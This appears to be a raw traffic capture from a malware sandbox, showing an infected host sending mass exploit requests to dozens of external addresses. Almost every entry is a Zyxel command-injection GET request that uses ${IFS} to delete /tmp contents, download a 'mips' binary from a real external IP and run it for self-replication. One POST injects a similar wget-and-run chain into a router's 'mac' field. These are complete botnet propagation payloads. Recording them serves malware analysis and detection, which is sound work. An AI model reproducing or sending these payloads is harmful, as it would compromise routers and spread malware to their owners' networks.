                              Mar 31, 2024 08:41:15.692384005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3171192.168.2.135088692.120.2.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.692421913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3172192.168.2.135154827.76.96.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.692467928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3173192.168.2.1355454182.177.59.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.692513943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3174192.168.2.133580860.77.105.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.692545891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3175192.168.2.1352066173.194.215.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.692609072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3176192.168.2.13398001.121.73.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.692637920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3177192.168.2.1346244191.26.131.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.692684889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3178192.168.2.135985461.182.153.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.692723989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3179192.168.2.135049896.127.143.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.692761898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3180192.168.2.1340540101.129.158.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.693072081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3181192.168.2.135499024.199.120.2108080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:16.603317976 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3182192.168.2.1350820186.230.176.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:16.697767019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3183192.168.2.1333054192.191.164.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:16.697792053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3184192.168.2.1353216181.53.243.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:16.697865009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3185192.168.2.1352790168.27.43.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:16.697932005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3186192.168.2.135874071.200.84.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:16.697966099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3187192.168.2.1350710160.233.163.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:16.698002100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3188192.168.2.1341678114.192.106.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:16.698035955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3189192.168.2.1336786220.19.70.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:16.698105097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3190192.168.2.1353678136.11.156.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:16.698142052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3191192.168.2.1345984146.72.32.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:16.698178053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3192192.168.2.1353668151.23.91.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:16.698219061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3193192.168.2.1343628205.171.114.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:16.698255062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3194192.168.2.1336042175.31.255.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:16.698307991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3195192.168.2.134360860.49.46.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:16.698353052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3196192.168.2.134237866.195.119.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:16.698384047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3197192.168.2.134764265.53.43.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:16.698438883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3198192.168.2.134082850.163.59.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:16.698470116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3199192.168.2.134400824.51.113.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:16.698525906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3200192.168.2.134692281.140.239.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:16.698575974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3201192.168.2.133771643.247.44.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:16.698627949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3202192.168.2.1354944137.33.102.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:16.698659897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3203192.168.2.1335994196.201.198.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:16.699001074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3204192.168.2.1355310222.45.16.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:16.699081898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3205192.168.2.133648461.249.138.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:17.703372002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3206192.168.2.1338780179.101.50.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:17.703413963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3207192.168.2.13414561.9.36.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:17.703457117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3208192.168.2.1356090162.155.134.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:17.703490973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3209192.168.2.1356730144.207.170.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:17.703574896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3210192.168.2.1358170209.97.120.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:18.706877947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3211192.168.2.1348890158.114.253.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:18.706908941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3212192.168.2.1346390181.228.75.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:18.706933975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3213192.168.2.135546876.227.31.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:18.706969976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3214192.168.2.134833093.55.236.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:18.707016945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3215192.168.2.133475074.239.70.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:18.707060099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3216192.168.2.1348798169.191.253.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:18.707078934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3217192.168.2.1335038161.254.47.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.716988087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3218192.168.2.1349574174.31.117.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.717040062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3219192.168.2.1357260129.140.154.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.717078924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3220192.168.2.135835894.111.236.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.717143059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3221192.168.2.133916464.43.255.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.717200994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3222192.168.2.1334846136.144.19.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.717235088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3223192.168.2.1346892124.186.198.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.717266083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3224192.168.2.1346310126.245.121.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.717292070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3225192.168.2.1352562164.16.41.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.717360020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3226192.168.2.135104657.22.157.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.717406034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3227192.168.2.136097282.207.104.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.717447996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3228192.168.2.1336614114.109.164.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.717504025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3229192.168.2.135706853.118.239.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.717525005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3230192.168.2.134272478.19.27.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.717586040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3231192.168.2.1334392167.242.50.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.717623949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3232192.168.2.136096482.154.35.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.717679977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3233192.168.2.1334534136.189.2.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.717730999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3234192.168.2.1334450165.36.204.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.717761993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3235192.168.2.133844836.175.156.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.717796087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3236192.168.2.1357106135.203.184.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.717859983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3237192.168.2.1353426107.247.164.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.717901945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3238192.168.2.1347656154.5.69.64443
                              TimestampBytes transferredDirectionData
